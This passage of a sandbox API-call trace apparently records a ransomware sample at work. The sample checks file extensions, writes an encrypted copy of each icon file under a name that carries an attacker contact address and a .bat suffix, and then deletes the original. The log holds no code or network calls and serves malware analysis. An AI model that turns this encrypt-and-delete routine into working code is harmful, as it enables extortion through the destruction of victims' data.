(lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0047.665] lstrlenW (lpString=".doc") returned 4 [0047.665] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.665] lstrlenW (lpString=".docx") returned 5 [0047.665] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0047.665] lstrlenW (lpString=".pdf") returned 4 [0047.665] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.665] lstrlenW (lpString=".xls") returned 4 [0047.665] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.665] lstrlenW (lpString=".xlsx") returned 5 [0047.665] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0047.665] lstrlenW (lpString=".ppt") returned 4 [0047.665] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.665] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0047.665] lstrlenW (lpString=".zip") returned 4 [0047.665] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.666] lstrlenW (lpString=".rar") returned 4 [0047.666] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.666] lstrlenW (lpString=".bz2") returned 4 [0047.666] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.666] lstrlenW (lpString=".7z") returned 3 [0047.666] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.666] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0047.666] lstrlenW (lpString=".dbf") returned 4 [0047.666] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.666] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0047.666] lstrlenW (lpString=".1cd") returned 4 [0047.666] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.666] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0047.666] lstrlenW (lpString=".jpg") returned 4 [0047.666] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.666] lstrcmpiW (lpString1=".ico", lpString2=".bat") returned 1 [0047.666] lstrlenW (lpString="Rotate7.ico") returned 11 [0047.666] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0047.667] GetFileSizeEx (in: hFile=0x2d4, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=894) returned 1 [0047.667] CloseHandle (hObject=0x2d4) returned 1 [0047.667] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico")) returned 0x80 [0047.667] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.667] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0047.667] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.667] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.667] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0047.668] GetLastError () returned 0x0 [0047.668] ReadFile (in: hFile=0x2d4, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x37e, lpOverlapped=0x0) returned 1 [0047.669] WriteFile (in: hFile=0x2dc, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x380, lpOverlapped=0x0) returned 1 [0047.670] ReadFile (in: hFile=0x2d4, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.670] WriteFile (in: hFile=0x2dc, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0xea, lpOverlapped=0x0) returned 1 [0047.670] SetEndOfFile (hFile=0x2dc) returned 1 [0047.670] CloseHandle (hObject=0x2dc) returned 1 [0047.671] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.671] SetEndOfFile (hFile=0x2d4) returned 1 [0047.672] CloseHandle (hObject=0x2d4) returned 1 [0047.672] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.672] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico")) returned 1 [0047.673] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0047.673] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0047.673] lstrlenW (lpString=".doc") returned 4 [0047.673] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0047.673] lstrlenW (lpString=".docx") returned 5 [0047.673] lstrcmpiW (lpString1=".docx", lpString2="7.ico") returned -1 [0047.673] lstrlenW (lpString=".pdf") returned 4 [0047.673] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0047.673] lstrlenW (lpString=".xls") returned 4 [0047.673] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0047.673] lstrlenW (lpString=".xlsx") returned 5 [0047.673] lstrcmpiW (lpString1=".xlsx", lpString2="7.ico") returned -1 [0047.673] lstrlenW (lpString=".ppt") returned 4 [0047.673] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0047.673] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0047.673] lstrlenW (lpString=".zip") returned 4 [0047.673] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0047.673] lstrlenW (lpString=".rar") returned 4 [0047.673] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0047.673] lstrlenW (lpString=".bz2") returned 4 [0047.673] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0047.673] lstrlenW (lpString=".7z") returned 3 [0047.673] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0047.674] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0047.674] lstrlenW (lpString=".dbf") returned 4 [0047.674] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0047.674] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0047.674] lstrlenW (lpString=".1cd") returned 4 [0047.674] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0047.674] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0047.674] lstrlenW (lpString=".jpg") returned 4 [0047.674] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0047.674] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0047.674] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0047.674] lstrlenW (lpString=".doc") returned 4 [0047.674] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0047.674] lstrlenW (lpString=".docx") returned 5 [0047.674] lstrcmpiW (lpString1=".docx", lpString2="7.ico") returned -1 [0047.674] lstrlenW (lpString=".pdf") returned 4 [0047.674] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0047.674] lstrlenW (lpString=".xls") returned 4 [0047.674] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0047.674] lstrlenW (lpString=".xlsx") returned 5 [0047.674] lstrcmpiW (lpString1=".xlsx", lpString2="7.ico") returned -1 [0047.674] lstrlenW (lpString=".ppt") returned 4 [0047.674] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0047.674] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0047.674] lstrlenW (lpString=".zip") returned 4 [0047.674] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0047.674] lstrlenW (lpString=".rar") returned 4 [0047.674] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0047.674] lstrlenW (lpString=".bz2") returned 4 [0047.675] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0047.675] lstrlenW (lpString=".7z") returned 3 [0047.675] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0047.675] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0047.675] lstrlenW (lpString=".dbf") returned 4 [0047.675] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0047.675] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0047.675] lstrlenW (lpString=".1cd") returned 4 [0047.675] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0047.675] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0047.675] lstrlenW (lpString=".jpg") returned 4 [0047.675] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0047.675] lstrcmpiW (lpString1=".ico", lpString2=".bat") returned 1 [0047.675] lstrlenW (lpString="Rotate8.ico") returned 11 [0047.675] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0047.686] GetFileSizeEx (in: hFile=0x2d4, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=894) returned 1 [0047.686] CloseHandle (hObject=0x2d4) returned 1 [0047.686] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico")) returned 0x80 [0047.686] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.686] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0047.686] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.686] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.686] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0047.687] GetLastError () returned 0x0 [0047.687] ReadFile (in: hFile=0x2d4, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x37e, lpOverlapped=0x0) returned 1 [0047.707] WriteFile (in: hFile=0x2dc, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x380, lpOverlapped=0x0) returned 1 [0047.708] ReadFile (in: hFile=0x2d4, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.708] WriteFile (in: hFile=0x2dc, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0xea, lpOverlapped=0x0) returned 1 [0047.708] SetEndOfFile (hFile=0x2dc) returned 1 [0047.708] CloseHandle (hObject=0x2dc) returned 1 [0047.709] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.709] SetEndOfFile (hFile=0x2d4) returned 1 [0047.710] CloseHandle (hObject=0x2d4) returned 1 [0047.710] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.710] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico")) returned 1 [0047.710] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0047.710] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0047.710] lstrlenW (lpString=".doc") returned 4 [0047.710] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0047.711] lstrlenW (lpString=".docx") returned 5 [0047.711] lstrcmpiW (lpString1=".docx", lpString2="8.ico") returned -1 [0047.711] lstrlenW (lpString=".pdf") returned 4 [0047.711] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0047.711] lstrlenW (lpString=".xls") returned 4 [0047.711] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0047.711] lstrlenW (lpString=".xlsx") returned 5 [0047.711] lstrcmpiW (lpString1=".xlsx", lpString2="8.ico") returned -1 [0047.711] lstrlenW (lpString=".ppt") returned 4 [0047.711] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0047.711] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0047.711] lstrlenW (lpString=".zip") returned 4 [0047.711] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0047.711] lstrlenW (lpString=".rar") returned 4 [0047.711] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0047.711] lstrlenW (lpString=".bz2") returned 4 [0047.711] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0047.711] lstrlenW (lpString=".7z") returned 3 [0047.711] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0047.711] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0047.711] lstrlenW (lpString=".dbf") returned 4 [0047.711] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0047.711] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0047.711] lstrlenW (lpString=".1cd") returned 4 [0047.711] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0047.711] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0047.711] lstrlenW (lpString=".jpg") returned 4 [0047.711] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0047.711] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0047.711] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0047.711] lstrlenW (lpString=".doc") returned 4 [0047.711] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0047.711] lstrlenW (lpString=".docx") returned 5 [0047.711] lstrcmpiW (lpString1=".docx", lpString2="8.ico") returned -1 [0047.711] lstrlenW (lpString=".pdf") returned 4 [0047.711] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0047.711] lstrlenW (lpString=".xls") returned 4 [0047.711] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0047.712] lstrlenW (lpString=".xlsx") returned 5 [0047.712] lstrcmpiW (lpString1=".xlsx", lpString2="8.ico") returned -1 [0047.712] lstrlenW (lpString=".ppt") returned 4 [0047.712] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0047.712] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0047.712] lstrlenW (lpString=".zip") returned 4 [0047.712] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0047.712] lstrlenW (lpString=".rar") returned 4 [0047.712] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0047.712] lstrlenW (lpString=".bz2") returned 4 [0047.712] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0047.712] lstrlenW (lpString=".7z") returned 3 [0047.712] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0047.712] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0047.712] lstrlenW (lpString=".dbf") returned 4 [0047.712] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0047.712] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0047.712] lstrlenW (lpString=".1cd") returned 4 [0047.712] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0047.712] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0047.712] lstrlenW (lpString=".jpg") returned 4 [0047.712] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0047.712] lstrcmpiW (lpString1=".ico", lpString2=".bat") returned 1 [0047.712] lstrlenW (lpString="Save.ico") returned 8 [0047.712] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0047.712] GetFileSizeEx (in: hFile=0x2d4, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=1150) returned 1 [0047.712] CloseHandle (hObject=0x2d4) returned 1 [0047.713] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico")) returned 0x80 [0047.713] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.713] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0047.713] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.713] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.713] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0047.713] GetLastError () returned 0x0 [0047.713] ReadFile (in: hFile=0x2d4, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x47e, lpOverlapped=0x0) returned 1 [0047.715] WriteFile (in: hFile=0x2dc, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x480, lpOverlapped=0x0) returned 1 [0047.716] ReadFile (in: hFile=0x2d4, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.716] WriteFile (in: hFile=0x2dc, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0xe4, lpOverlapped=0x0) returned 1 [0047.716] SetEndOfFile (hFile=0x2dc) returned 1 [0047.716] CloseHandle (hObject=0x2dc) returned 1 [0047.716] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.716] SetEndOfFile (hFile=0x2d4) returned 1 [0047.717] CloseHandle (hObject=0x2d4) returned 1 [0047.717] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.718] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico")) returned 1 [0047.718] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0047.718] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0047.718] lstrlenW (lpString=".doc") returned 4 [0047.718] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0047.718] lstrlenW (lpString=".docx") returned 5 [0047.718] lstrcmpiW (lpString1=".docx", lpString2="e.ico") returned -1 [0047.718] lstrlenW (lpString=".pdf") returned 4 [0047.718] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0047.718] lstrlenW (lpString=".xls") returned 4 [0047.718] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0047.718] lstrlenW (lpString=".xlsx") returned 5 [0047.718] lstrcmpiW (lpString1=".xlsx", lpString2="e.ico") returned -1 [0047.718] lstrlenW (lpString=".ppt") returned 4 [0047.718] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0047.718] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0047.718] lstrlenW (lpString=".zip") returned 4 [0047.718] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0047.718] lstrlenW (lpString=".rar") returned 4 [0047.718] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0047.718] lstrlenW (lpString=".bz2") returned 4 [0047.718] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0047.718] lstrlenW (lpString=".7z") returned 3 [0047.719] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0047.719] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0047.719] lstrlenW (lpString=".dbf") returned 4 [0047.719] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0047.719] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0047.719] lstrlenW (lpString=".1cd") returned 4 [0047.719] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0047.719] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0047.719] lstrlenW (lpString=".jpg") returned 4 [0047.719] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0047.719] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0047.719] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0047.719] lstrlenW (lpString=".doc") returned 4 [0047.719] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0047.719] lstrlenW (lpString=".docx") returned 5 [0047.719] lstrcmpiW (lpString1=".docx", lpString2="e.ico") returned -1 [0047.719] lstrlenW (lpString=".pdf") returned 4 [0047.719] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0047.719] lstrlenW (lpString=".xls") returned 4 [0047.719] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0047.719] lstrlenW (lpString=".xlsx") returned 5 [0047.719] lstrcmpiW (lpString1=".xlsx", lpString2="e.ico") returned -1 [0047.719] lstrlenW (lpString=".ppt") returned 4 [0047.719] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0047.719] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0047.719] lstrlenW (lpString=".zip") returned 4 [0047.719] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0047.719] lstrlenW (lpString=".rar") returned 4 [0047.719] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0047.719] lstrlenW (lpString=".bz2") returned 4 [0047.719] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0047.719] lstrlenW (lpString=".7z") returned 3 [0047.719] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0047.719] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0047.719] lstrlenW (lpString=".dbf") returned 4 [0047.719] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0047.720] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0047.720] lstrlenW (lpString=".1cd") returned 4 [0047.720] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0047.720] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0047.720] lstrlenW (lpString=".jpg") returned 4 [0047.720] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0047.720] lstrcmpiW (lpString1=".ico", lpString2=".bat") returned 1 [0047.720] lstrlenW (lpString="Setup.ico") returned 9 [0047.720] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0047.720] GetFileSizeEx (in: hFile=0x2d4, 